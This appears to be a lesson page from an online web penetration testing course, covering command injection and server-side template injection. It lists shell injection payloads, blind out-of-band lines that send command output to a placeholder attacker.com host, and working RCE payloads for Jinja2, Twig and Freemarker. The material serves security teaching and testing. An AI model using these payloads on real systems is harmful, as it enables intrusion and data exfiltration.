Web Application Penetration Testing Complete Masterclass

🌐 Web Pentest · Both Beginner 16 modules 2.7h 0 enrolled

From zero-knowledge to professional-grade tester. Every attack explained step-by-step with real payloads, full methodology, beginner mindset guidance, and a complete corporate pentest report at the end.

Instructor

lazyhackers

Curriculum — 5 sections · 16 modules · 2.7h

Now Learning

Command Injection & SSTI

Lesson · 10 min

← Prev Next →

Command Injection Payloads

When applications pass user input to OS shell commands — ping, nslookup, file operations, image conversion — test every such field.

Payload	OS	Technique
; whoami	Unix	Semicolon — run second command after first completes
\| id	Unix	Pipe — first command output goes to second
&& cat /etc/passwd	Unix	AND — run only if first command succeeds
\|\| id	Unix	OR — run only if first command fails
`id`	Unix	Backtick command substitution
$(id)	Unix	Dollar sign command substitution
%0a id	Unix	URL-encoded newline — bypasses inline filter
127.0.0.1; id	Unix	Classic ping field injection test
& whoami	Windows	Background execution separator
\| dir	Windows	Windows pipe — list directory

Blind Command Injection — No Output Returned

# Time-based detection
127.0.0.1; sleep 5
127.0.0.1 & timeout /T 5    # Windows

# Out-of-band DNS detection (use Burp Collaborator or interactsh)
127.0.0.1; nslookup attacker.com
127.0.0.1; curl https://attacker.com/$(id)
127.0.0.1; ping -c 1 $(whoami).attacker.com

# interactsh — free OOB detection server
interactsh-client   # gives unique URL like xyz.oast.pro
127.0.0.1; curl https://$(whoami).xyz.oast.pro

Server-Side Template Injection (SSTI) Detection

When user input is embedded inside a template engine (Jinja2, Twig, Freemarker) and rendered server-side — can lead to RCE.

# STEP 1 — Detection (math expression evaluated = SSTI vulnerable)
{{7*7}}       # Returns 49 = Jinja2 or Twig
${7*7}       # Returns 49 = Freemarker or Mako
<%= 7*7 %>   # Returns 49 = ERB (Ruby)

# STEP 2 — Identify engine
{{7*'7'}}     # Returns '7777777' = Jinja2 (Python)
{{7*'7'}}     # Returns 49 = Twig (PHP)

# ── JINJA2 RCE (Python/Flask/Django) ──────────────────────────
{{ config.items() }}                        # Dump config including SECRET_KEY

# Full RCE payload (find subprocess in subclasses)
{{ ''.__class__.__mro__[1].__subclasses__()[396]('id',shell=True,stdout=-1).communicate() }}

# ── TWIG RCE (PHP) ─────────────────────────────────────────────
{{_self.env.registerUndefinedFilterCallback("exec")}}{{_self.env.getFilter("id")}}

# ── FREEMARKER RCE (Java) ──────────────────────────────────────
<#assign ex="freemarker.template.utility.Execute"?new()>${ex("id")}